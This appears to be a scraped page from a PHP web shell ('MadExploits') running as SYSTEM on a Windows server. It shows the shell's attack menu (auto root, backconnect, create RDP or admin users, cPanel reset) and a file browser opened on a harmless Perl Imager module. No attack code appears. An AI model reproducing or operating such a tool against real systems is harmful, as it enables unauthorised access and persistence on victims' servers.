Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Imager /
Filter /
[ HOME SHELL ]
Name
Size
Permission
Action
DynTest.pm
482
B
-rw-rw-rw-
Flines.pm
893
B
-rw-rw-rw-
Mandelbrot.pm
1.47
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Flines.pm
package Imager::Filter::Flines; use 5.006; use strict; use Imager; BEGIN { our $VERSION = "0.04"; require XSLoader; XSLoader::load('Imager::Filter::Flines', $VERSION); } Imager->register_filter(type=>'flines', callsub => sub { my %hsh = @_; flines($hsh{image}) }, defaults => {}, callseq => [ 'image' ] ); 1; __END__ =head1 NAME Imager::Filter::Flines - dim alternate lines to emulate a video display =head1 SYNOPSIS use Imager; use Imager::Filter::Flines; $img->filter(type=>'flines'); =head1 DESCRIPTION This is an adaption of the C<flines> dynamically loadable filter provided in dynfilt/ in previous releases of Imager. This filter has no parameters. =head1 AUTHOR Original by Arnar M. Hrafnkelsson. Adapted by Tony Cook <tonyc@cpan.org> =head1 SEE ALSO Imager, Imager::Filters. =cut
Close